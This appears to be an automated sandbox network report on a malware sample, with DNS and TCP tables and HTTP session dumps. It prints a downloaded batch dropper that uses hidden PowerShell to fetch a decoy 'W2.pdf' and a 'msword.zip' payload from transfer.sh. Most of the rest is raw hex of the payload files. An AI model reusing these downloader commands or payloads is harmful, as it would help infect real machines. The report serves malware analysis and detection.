                                                                                                      Feb 15, 2024 06:28:05.068665028 CET49734443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:28:05.107134104 CET49734443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:28:05.107187986 CET44349734144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:28:05.107233047 CET44349734144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:28:05.107332945 CET44349734144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:28:05.107394934 CET49734443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:28:05.107394934 CET49734443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:28:05.107419968 CET44349734144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:28:05.107477903 CET49734443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:28:05.107546091 CET49734443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:28:05.323606014 CET49734443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:28:05.372339010 CET49734443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:28:05.536283970 CET49734443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:28:13.462888956 CET49744443192.168.2.423.46.240.131
                                                                                                      Feb 15, 2024 06:28:13.462923050 CET4434974423.46.240.131192.168.2.4
                                                                                                      Feb 15, 2024 06:28:13.463103056 CET49744443192.168.2.423.46.240.131
                                                                                                      Feb 15, 2024 06:28:13.463160038 CET49744443192.168.2.423.46.240.131
                                                                                                      Feb 15, 2024 06:28:13.463169098 CET4434974423.46.240.131192.168.2.4
                                                                                                      Feb 15, 2024 06:28:13.782679081 CET4434974423.46.240.131192.168.2.4
                                                                                                      Feb 15, 2024 06:28:13.782948971 CET49744443192.168.2.423.46.240.131
                                                                                                      Feb 15, 2024 06:28:13.783008099 CET4434974423.46.240.131192.168.2.4
                                                                                                      Feb 15, 2024 06:28:13.786569118 CET4434974423.46.240.131192.168.2.4
                                                                                                      Feb 15, 2024 06:28:13.786741018 CET49744443192.168.2.423.46.240.131
                                                                                                      Feb 15, 2024 06:28:13.788496971 CET49744443192.168.2.423.46.240.131
                                                                                                      Feb 15, 2024 06:28:13.788594961 CET4434974423.46.240.131192.168.2.4
                                                                                                      Feb 15, 2024 06:28:13.788693905 CET49744443192.168.2.423.46.240.131
                                                                                                      Feb 15, 2024 06:28:13.829914093 CET4434974423.46.240.131192.168.2.4
                                                                                                      Feb 15, 2024 06:28:13.891886950 CET4434974423.46.240.131192.168.2.4
                                                                                                      Feb 15, 2024 06:28:13.892273903 CET49744443192.168.2.423.46.240.131
                                                                                                      Feb 15, 2024 06:28:13.894068003 CET49744443192.168.2.423.46.240.131
                                                                                                      Feb 15, 2024 06:28:13.894107103 CET4434974423.46.240.131192.168.2.4
                                                                                                      Feb 15, 2024 06:29:53.859844923 CET497507008192.168.2.445.88.186.197
                                                                                                      Feb 15, 2024 06:29:53.994373083 CET70084975045.88.186.197192.168.2.4
                                                                                                      Feb 15, 2024 06:29:53.995105028 CET497507008192.168.2.445.88.186.197
                                                                                                      Feb 15, 2024 06:29:54.973018885 CET497507008192.168.2.445.88.186.197
                                                                                                      Feb 15, 2024 06:29:55.156127930 CET70084975045.88.186.197192.168.2.4
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Feb 15, 2024 06:27:54.989969015 CET5318053192.168.2.41.1.1.1
                                                                                                      Feb 15, 2024 06:27:55.110115051 CET53531801.1.1.1192.168.2.4
                                                                                                      Feb 15, 2024 06:29:53.672960997 CET5188853192.168.2.41.1.1.1
                                                                                                      Feb 15, 2024 06:29:53.835119963 CET53518881.1.1.1192.168.2.4
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Feb 15, 2024 06:27:54.989969015 CET192.168.2.41.1.1.10xd831Standard query (0)transfer.shA (IP address)IN (0x0001)false
                                                                                                      Feb 15, 2024 06:29:53.672960997 CET192.168.2.41.1.1.10xe94Standard query (0)me-work.comA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Feb 15, 2024 06:27:55.110115051 CET1.1.1.1192.168.2.40xd831No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)false
                                                                                                      Feb 15, 2024 06:29:53.835119963 CET1.1.1.1192.168.2.40xe94No error (0)me-work.com45.88.186.197A (IP address)IN (0x0001)false
                                                                                                      • transfer.sh
                                                                                                      • armmf.adobe.com
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449729144.76.136.1534437384C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-02-15 05:27:55 UTC81OUTGET /get/YqLLdAKXyI/c.bat HTTP/1.1
                                                                                                      Host: transfer.sh
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-02-15 05:27:56 UTC595INHTTP/1.1 200 OK
                                                                                                      Cache-Control: no-store
                                                                                                      Content-Disposition: attachment; filename="c.bat"
                                                                                                      Content-Length: 492
                                                                                                      Content-Type: application/x-msdos-program
                                                                                                      Retry-After: Thu, 15 Feb 2024 06:27:56 GMT
                                                                                                      Server: Transfer.sh HTTP Server
                                                                                                      Vary: Range, Referer, X-Decrypt-Password
                                                                                                      X-Made-With: <3 by DutchCoders
                                                                                                      X-Ratelimit-Key: 81.181.57.74
                                                                                                      X-Ratelimit-Limit: 10
                                                                                                      X-Ratelimit-Rate: 600
                                                                                                      X-Ratelimit-Remaining: 9
                                                                                                      X-Ratelimit-Reset: 1707974876
                                                                                                      X-Remaining-Days: n/a
                                                                                                      X-Remaining-Downloads: n/a
                                                                                                      X-Served-By: Proudly served by DutchCoders
                                                                                                      Date: Thu, 15 Feb 2024 05:27:55 GMT
                                                                                                      Connection: close
                                                                                                      2024-02-15 05:27:56 UTC492INData Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 73 65 74 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 66 65 72 2e 73 68 2f 67 65 74 2f 57 44 36 33 31 70 66 30 32 47 2f 6d 73 77 6f 72 64 2e 7a 69 70 0d 0a 73 65 74 20 75 72 6c 32 3d 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 66 65 72 2e 73 68 2f 67 65 74 2f 66 48 4d 42 32 6c 49 39 57 33 2f 57 32 2e 70 64 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 2d 43 6f 6d 6d 61 6e 64 20 22 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 25 75 72 6c 32 25 20 2d 4f 75 74 46 69 6c 65 20 25 74 65 6d 70 25 5c 57 32 2e 70 64 66 22 0d 0a 63 64 20 25 74 65 6d 70 25 0d 0a 73 74 61 72 74 20 57 32 2e 70 64 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 57 69 6e 64
                                                                                                      Data Ascii: @echo offset url=https://transfer.sh/get/WD631pf02G/msword.zipset url2=https://transfer.sh/get/fHMB2lI9W3/W2.pdfpowershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url2% -OutFile %temp%\W2.pdf"cd %temp%start W2.pdfpowershell -Wind


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449730144.76.136.1534437604C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-02-15 05:27:57 UTC177OUTGET /get/fHMB2lI9W3/W2.pdf HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                      Host: transfer.sh
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-02-15 05:27:58 UTC588INHTTP/1.1 200 OK
                                                                                                      Cache-Control: no-store
                                                                                                      Content-Disposition: attachment; filename="W2.pdf"
                                                                                                      Content-Length: 1242540
                                                                                                      Content-Type: application/pdf
                                                                                                      Retry-After: Thu, 15 Feb 2024 06:28:02 GMT
                                                                                                      Server: Transfer.sh HTTP Server
                                                                                                      Vary: Range, Referer, X-Decrypt-Password
                                                                                                      X-Made-With: <3 by DutchCoders
                                                                                                      X-Ratelimit-Key: 81.181.57.74
                                                                                                      X-Ratelimit-Limit: 10
                                                                                                      X-Ratelimit-Rate: 600
                                                                                                      X-Ratelimit-Remaining: 9
                                                                                                      X-Ratelimit-Reset: 1707974882
                                                                                                      X-Remaining-Days: n/a
                                                                                                      X-Remaining-Downloads: n/a
                                                                                                      X-Served-By: Proudly served by DutchCoders
                                                                                                      Date: Thu, 15 Feb 2024 05:27:57 GMT
                                                                                                      Connection: close
                                                                                                      2024-02-15 05:27:58 UTC598INData Raw: 25 50 44 46 2d 31 2e 34 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 56 65 72 73 69 6f 6e 20 2f 31 2e 37 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 4d 65 74 61 64 61 74 61 20 33 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 43 72 65 61 74 6f 72 20 28 50 44 46 32 34 29 0a 2f 50 72 6f 64 75 63 65 72 20 28 50 44 46 32 34 29 0a 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 20 28 44 3a 32 30 32 33 30 34 32 38 31 33 33 34 32 30 2b 30 30 27 30 30 27 29 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 50 61 67 65 73 0a 2f 4b 69 64 73 20 5b 35 20 30 20 52 20 36 20 30 20 52 20 37 20 30 20 52 5d 0a 2f 43 6f 75 6e 74 20 33 0a 3e 3e 0a 65 6e 64
                                                                                                      Data Ascii: %PDF-1.4%1 0 obj<</Type /Catalog/Version /1.7/Pages 2 0 R/Metadata 3 0 R>>endobj4 0 obj<</Creator (PDF24)/Producer (PDF24)/CreationDate (D:20230428133420+00'00')>>endobj2 0 obj<</Type /Pages/Kids [5 0 R 6 0 R 7 0 R]/Count 3>>end
                                                                                                      2024-02-15 05:27:58 UTC2372INData Raw: 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 78 6d 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 64 63 3d 22 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 65 6c 65 6d 65 6e 74 73 2f 31 2e 31 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 78 6d 70 4d 4d 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 6d 6d 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 73 74 45 76 74 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 73 54 79 70 65 2f 52 65 73 6f 75 72 63 65 45 76 65 6e 74 23 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73
                                                                                                      Data Ascii: xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns
                                                                                                      2024-02-15 05:27:58 UTC538INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii:
                                                                                                      2024-02-15 05:27:58 UTC4096INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii:
                                                                                                      2024-02-15 05:27:58 UTC5930INData Raw: bd 8a 1c 20 47 62 2c f4 7e a4 d2 13 d9 bb 55 29 52 14 db 1c 7b 5f 4f 66 85 1d 66 b9 e1 f5 9d cf 9d 15 66 41 08 9a 4e 76 91 c1 e2 41 ac 7b 7e 6d 1c 5d 88 22 2f be 2e 57 76 07 94 b9 de 05 5d 6a 33 1c 51 ed 94 bd 5d 3b 1b 24 3c 34 32 07 0e f2 8d e1 a1 04 bc 31 3a 0d 3b 54 81 fc 32 ec a0 59 2a 84 5d 48 bf 0c 76 a1 08 ea 82 49 8e 3e c9 1b 28 53 50 05 79 97 49 67 0d 3f cc a1 42 86 41 50 37 9c 3c 2f 17 b8 d1 11 b7 20 57 50 b4 70 2c a3 21 45 36 de 1a 30 c4 80 b6 39 4e d3 c0 71 d2 00 97 a4 cf 8c d6 ae ad b2 6f ee c7 23 ba c3 35 76 ec 16 3b fc 8e 54 ba b1 7c 65 2e 73 63 2e ab ab c2 69 43 bd 8f c9 10 3b c8 a2 6a f6 97 53 80 91 e0 ff cb 9b 32 a0 f0 e5 d7 cd f7 69 f1 65 43 6e a5 46 6a 42 67 c2 00 ab 9a d6 fc f5 33 68 4d 9c 3d 01 2c e8 41 91 37 3e 6d 37 ac bc 95 e0 cb
                                                                                                      Data Ascii: Gb,~U)R{_OfffANvA{~m]"/.Wv]j3Q];$<421:;T2Y*]HvI>(SPyIg?BAP7</ WPp,!E609Nqo#5v;T|e.sc.iC;jS2ieCnFjBg3hM=,A7>m7
                                                                                                      2024-02-15 05:27:58 UTC191INData Raw: e6 82 89 53 6b 80 70 56 82 e0 f0 d9 ad c8 75 55 ec 79 2a 86 a1 1a 73 28 ab d0 35 a9 a8 04 69 b0 5b 85 e6 9e ef 44 41 07 cf 15 0c 89 88 85 c0 b2 58 42 30 f2 c2 10 52 fc ac 5c 14 72 d9 bc c2 63 e8 8d 76 ae 2d be d5 b6 e6 50 9b 70 d7 e4 d2 3d 2b b6 1e f9 54 2d a8 46 aa 69 65 b0 32 43 3f 18 4f 2f 19 eb 72 f7 42 00 c3 2d 85 31 19 b8 53 f0 cf ba 3a 9b bf 7f 45 42 58 43 76 18 3e 91 90 0b 86 a4 56 5f 92 84 48 5e e9 54 05 1b 83 6e d9 2e 58 0c cc e3 50 7a a2 06 c3 8a a2 40 89 6a 4f a5 9f 7e 6a f2 a1 60 3d b0 06 4c d5 65 a9 2d d1 1a 35 53 44 08 eb 0e 57 ca d2 cd 4d 0e e8 4a a4
                                                                                                      Data Ascii: SkpVuUy*s(5i[DAXB0R\rcv-Pp=+T-Fie2C?O/rB-1S:EBXCv>V_H^Tn.XPz@jO~j`=Le-5SDWMJ
                                                                                                      2024-02-15 05:27:58 UTC8302INData Raw: 97 81 4c 8e 17 82 71 9f dc c1 f3 d4 25 25 55 b1 47 12 0b 7e dc 4d 5e 66 9a 83 18 f2 6a 87 57 4b 31 83 51 95 6b 56 16 e2 a1 c0 29 a0 7a f8 9e 49 d6 33 b9 9d b2 1c af c6 95 3c 7b d0 df bc 2a af ac fc 7e 31 9e be 2a 8e b4 57 0a cd 4d 09 9f fc 58 86 52 3e 36 a1 fc 16 4a 31 b9 41 c5 bb d1 0d 1e 84 a4 31 ec 74 19 be c7 e4 3e 2d 07 d4 b9 e2 2d ca cc e6 9c 4c 36 20 e9 fd f0 fa 32 b2 93 ce ec 2a fc 71 71 3b 85 ec 2a c3 06 f7 d0 f3 be b3 90 bc ea 97 00 3c b2 02 d3 91 f2 08 48 89 62 f5 08 c2 84 93 ad dc 8c 00 6d 7e c6 b7 68 78 46 b7 f8 10 39 33 a2 f1 db 77 65 17 ce 76 53 54 b3 f8 65 74 09 c6 42 c7 db 31 9f 7e ff fc 55 20 a2 5d 82 c5 cf 3c 2e 1d 97 f1 c0 fb 90 58 5c 56 9b ae 75 79 24 5e 11 09 ce 7d c2 b9 f5 ff 1a 06 d2 5e c3 bc c6 35 68 26 3f 83 cd 66 66 b1 e7 69 8e
                                                                                                      Data Ascii: Lq%%UG~M^fjWK1QkV)zI3<{*~1*WMXR>6J1A1t>--L6 2*qq;*<Hbm~hxF93wevSTetB1~U ]<.X\Vuy$^}^5h&?ffi
                                                                                                      2024-02-15 05:27:58 UTC3282INData Raw: c1 29 4a c6 8d 14 38 e3 cc c2 25 dc d7 6f 74 66 20 32 1c b1 c5 28 3f 80 5d 14 ce 8f 62 09 cd 55 c6 8a 55 9b 7b a1 d4 be a2 76 27 8c dc 47 18 6d 32 1e 5d 1d 31 2d 11 0f 85 64 c3 a8 38 71 49 5f cf 48 1a 0d 39 d2 65 a6 6d e1 26 6a ca 47 e2 92 a2 44 c7 03 40 f3 63 af 21 e8 4c 1b 43 9d 1a 10 18 5f 39 50 01 f1 0f 79 cb ea 59 a7 79 9e 43 0e 38 da 9d ab 7d 96 91 9c 52 a3 89 75 c4 d5 2a 45 7b 7f df 69 31 3e 18 ab f6 66 5c 8b 1a 09 43 59 71 34 3a a4 1b 00 27 9e 58 d1 93 96 df 68 f7 1e a8 62 0c a2 44 50 ba a5 09 d3 72 96 ee 19 9d d4 40 ae ea 57 db db 78 ba 47 5d d0 fc ec ec a0 f4 37 95 1e df b0 20 82 1c 0d 06 30 0e c7 a6 64 d0 50 77 80 68 f2 1a 4a 76 38 94 2c 77 2d 49 25 fa 01 15 bb 1d 09 68 63 ee 69 7b da e7 b8 54 f2 cc ff 4d fa 29 1f f4 63 f6 c8 d8 95 e3 8c 8c ba
                                                                                                      Data Ascii: )J8%otf 2(?]bUU{v'Gm2]1-d8qI_H9em&jGD@c!LC_9PyYyC8}Ru*E{i1>f\CYq4:'XhbDPr@WxG]7 0dPwhJv8,w-I%hci{TM)c
                                                                                                      2024-02-15 05:27:58 UTC8907INData Raw: f9 bc f8 e5 6a e9 17 63 d2 d2 93 d4 15 79 1e 4b 09 cc ae f3 5e 59 ca de 77 57 bf 5a 39 69 d0 d2 23 fd d0 d2 37 c5 e7 f2 3a 21 9d 97 3e ac 54 8a 4b 0f 95 b6 5e 3e 5e e2 32 24 27 27 5d 6d eb 1f 18 e9 6d 15 43 06 c1 6f 99 95 c1 c1 0b 06 d6 03 cd 30 d1 9c d7 88 cb 98 04 b5 1a 64 8e 24 1e b8 af c6 28 9c 63 10 26 f2 e6 33 d2 bb 59 c3 36 a7 7a 75 a5 e2 00 59 07 df ca 82 87 00 79 3b 00 92 c5 92 00 69 64 b6 b1 7f bd ab 9f a5 9a c4 cf 1e ac 58 02 6b 9b 1f 7a b1 b8 7b b1 8b a2 4c ed 6c 84 c1 f6 d1 19 ce 72 aa 00 99 c7 9c f9 b0 82 5e e2 c3 61 83 1d 65 5c 8a 70 cd 28 a7 c1 cb 7a b4 ad b7 c7 eb 01 cb 4b 35 b2 eb c7 81 bb 2a 13 34 1e 49 6e 9e 23 f3 13 9b 9e 7a 63 d7 13 d3 25 51 5d 91 14 43 11 49 36 aa 5d 27 82 8a a0 a6 41 38 68 2a 6e 3a 02 1a 25 b6 cd b8 52 1c 84 8f dc
                                                                                                      Data Ascii: jcyK^YwWZ9i#7:!>TK^>^2$'']mmCo0d$(c&3Y6zuYy;idXkz{Llr^ae\p(zK5*4In#zc%Q]CI6]'A8h*n:%R
                                                                                                      2024-02-15 05:27:58 UTC4096INData Raw: 0a f3 2a b3 15 b4 e1 88 e1 72 ea 61 37 37 70 a7 12 cb 28 67 c6 15 52 e9 ae 6e 66 8a 6a 38 dd ac 96 e9 af 62 32 2d 58 2d 61 02 05 d3 15 ac 97 0f 0f 8b 5a 87 69 a0 c9 93 24 c8 98 e9 8a 3e cc 4b 95 95 57 d6 05 c0 8a 01 0c 19 2a 42 ae a0 c1 5c 5e d6 79 e9 db 50 6f a0 a6 b7 dd 81 96 38 a1 db 63 ba 9a f8 e8 38 12 d2 20 0d fb f2 d5 bf 68 51 c6 1c c0 70 fa 29 29 94 cb 4b 21 74 f2 fa 62 35 db f8 b8 72 57 74 28 8f 27 03 cd 1a 93 a0 b2 d7 54 69 b7 b4 4f 95 2d c8 6d 21 03 4c 04 04 96 f7 e2 32 06 a5 52 6e 41 9f b2 83 7c e8 96 8f b0 82 84 44 3a ca c0 e8 e8 b1 c9 c6 c7 36 f2 34 cc 84 a9 01 40 96 91 12 d2 c1 58 35 be ee 54 ae 96 1d 19 6a 10 42 74 c8 0c c4 46 8f 3b 9e 23 b4 5e 64 27 2d 1b 29 c3 95 d9 d8 c9 19 52 5d fd 08 9a 08 25 d9 7f 65 5e 55 80 5f fa 96 ca ad 65 4b 33
                                                                                                      Data Ascii: *ra77p(gRnfj8b2-X-aZi$>KW*B\^yPo8c8 hQp))K!tb5rWt('TiO-m!L2RnA|D:64@X5TjBtF;#^d'-)R]%e^U_eK3


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.449734144.76.136.1534437868C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-02-15 05:28:01 UTC181OUTGET /get/WD631pf02G/msword.zip HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                      Host: transfer.sh
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-02-15 05:28:02 UTC592INHTTP/1.1 200 OK
                                                                                                      Cache-Control: no-store
                                                                                                      Content-Disposition: attachment; filename="msword.zip"
                                                                                                      Content-Length: 1009860
                                                                                                      Content-Type: application/zip
                                                                                                      Retry-After: Thu, 15 Feb 2024 06:28:02 GMT
                                                                                                      Server: Transfer.sh HTTP Server
                                                                                                      Vary: Range, Referer, X-Decrypt-Password
                                                                                                      X-Made-With: <3 by DutchCoders
                                                                                                      X-Ratelimit-Key: 81.181.57.74
                                                                                                      X-Ratelimit-Limit: 10
                                                                                                      X-Ratelimit-Rate: 600
                                                                                                      X-Ratelimit-Remaining: 8
                                                                                                      X-Ratelimit-Reset: 1707974882
                                                                                                      X-Remaining-Days: n/a
                                                                                                      X-Remaining-Downloads: n/a
                                                                                                      X-Served-By: Proudly served by DutchCoders
                                                                                                      Date: Thu, 15 Feb 2024 05:28:01 GMT
                                                                                                      Connection: close
                                                                                                      2024-02-15 05:28:02 UTC594INData Raw: 50 4b 03 04 14 00 00 00 08 00 08 93 3f 58 8d 9c 3c ec 4e 68 0f 00 00 00 00 1e 0a 00 00 00 6d 73 77 6f 72 64 2e 63 6f 6d ec bd 79 7c 14 55 d6 30 5c 9d 74 27 cd 12 aa 81 04 82 6c 41 83 06 17 e8 66 33 2d 46 3a 90 c0 6d a8 c6 a0 8c 46 60 66 a2 42 8c 88 12 42 37 46 41 49 e8 84 a4 2c 4b 1b 65 9c 19 71 c6 0d 1d 71 66 14 e7 71 c2 aa 66 c1 04 70 0b a0 6c 99 19 51 46 ad b6 5d 02 38 10 40 e9 ef 9c 73 ab 7a 49 02 ce f7 be bf df fb d7 d3 90 ee aa ba f7 9e 7b ee b9 e7 9e ed 2e e5 99 1b 10 12 05 b3 80 9f 70 58 10 14 81 7f 5c c2 cf 7f 2a e0 af cf f0 6d 7d 84 37 7b 7c 30 62 8b 49 fa 60 c4 9c 92 bb 97 65 94 96 2d b9 ab ec f6 7b 33 ee bc fd be fb 96 78 33 ee 58 98 51 e6 bb 2f e3 ee fb 32 f2 6e bc 39 e3 de 25 0b 16 8e 4e 49 e9 99 a9 c3 28 c8 17 84 05 6b 92 f8 cd 6b 22 fd b4
                                                                                                      Data Ascii: PK?X<Nhmsword.comy|U0\t'lAf3-F:mF`fBB7FAI,KeqqfqfplQF]8@szI{.pX\*m}7{|0bI`e-{3x3XQ/2n9%NI(kk"
                                                                                                      2024-02-15 05:28:02 UTC2372INData Raw: 39 2f 33 83 c9 f3 33 b3 8a 03 da 7a d0 0b 4c c1 07 0a 3c d0 ae 16 f0 16 33 f9 77 a6 37 61 4e 2b e6 b4 69 cb 0a 2d 94 cf 8a f9 6c a1 3f e9 f0 25 75 41 66 87 07 2a 11 d7 5c 89 90 2a bf a9 45 08 f2 5f 32 2b f0 57 d5 7f e5 aa cc 00 fc 86 92 98 dc 2e c9 4d ac ba 4d ac 1a 0d a2 cd b1 3b 78 16 7e 58 4b 43 18 3e ac 7a f7 43 7d f2 1d f5 8e 53 4c 3e 1c 72 88 c3 5d 02 73 1e 16 6b 5a cc 08 6a a9 89 39 4f 8a ab 5f c7 9b 51 ef 31 75 45 d8 2d 77 b0 d3 9f b2 86 f0 64 36 e2 3c 33 35 33 ff 19 f3 ca 3f 54 66 df 59 ea 1b ed fb 8d 63 9f 38 5c 08 6e 27 f0 8d 08 5e 82 d6 14 30 d9 9b 59 ce aa f7 89 8f ce 05 75 12 60 ce 3d 62 8d 1b 41 fa cf 9a c5 d5 63 a9 a6 07 7f 74 cb 67 74 c8 fe af cc 4c 1d 92 2d a9 37 99 24 e7 5e 71 75 32 e4 90 64 29 93 21 59 8a d8 a8 bd 92 7a 1b 40 9e 9f 99
                                                                                                      Data Ascii: 9/33zL<3w7aN+i-l?%uAf*\*E_2+W.MM;x~XKC>zC}SL>r]skZj9O_Q1uE-wd6<353?TfYc8\n'^0Yu`=bActgtL-7$^qu2d)!Yz@
                                                                                                      2024-02-15 05:28:02 UTC538INData Raw: 1c e0 35 d1 fa c5 35 6f 0b 64 9f 65 21 0e 19 88 43 06 16 b4 63 c1 6c e0 bd 7e e8 1b a4 83 d5 8f 45 b3 b9 9d ec 3f 93 f4 d0 0a 26 ef 21 81 ad 78 ad 68 94 9b 24 c5 3c 08 2c ed 5e 56 b7 f3 b8 6f 36 5e d9 24 05 84 a9 c7 b9 d7 37 05 8d e6 5e e9 68 83 5b d3 f3 b3 f7 fa 1c f4 60 10 3d 18 84 0f 32 50 c5 83 9f df 81 1e b6 7c 9c cb af c1 89 68 d4 8b d5 0f 80 bd ce 5b 96 01 2d cb 22 1e 10 a2 b7 31 0d 95 59 9c 39 7a 49 b8 bb 7e 35 3e 4c b1 32 67 2f 71 5d fd 05 3a e8 67 d3 e5 06 b6 57 63 db 7e a1 7f d8 88 56 36 62 0f 03 2b 89 68 13 4c 60 db c7 e9 1f 36 e2 30 1b b1 9f 99 0e f3 14 33 33 ed 65 db 44 fd 83 85 c0 ea 6e f8 da 8a 8f 29 83 2d 72 05 5d 62 ee eb 3f ba aa 1b 1c b6 5c 8c b9 de d7 f9 eb d2 78 fe da da 13 9d e9 46 13 a7 5f 17 46 71 4f 8f 63 94 b7 2e 0c 1c 3e 15 39
                                                                                                      Data Ascii: 55ode!Ccl~E?&!xh$<,^Vo6^$7^h[`=2P|h[-"1Y9zI~5>L2g/q]:gWc~V6b+hL`6033eDn)-r]b?\xF_FqOc.>9
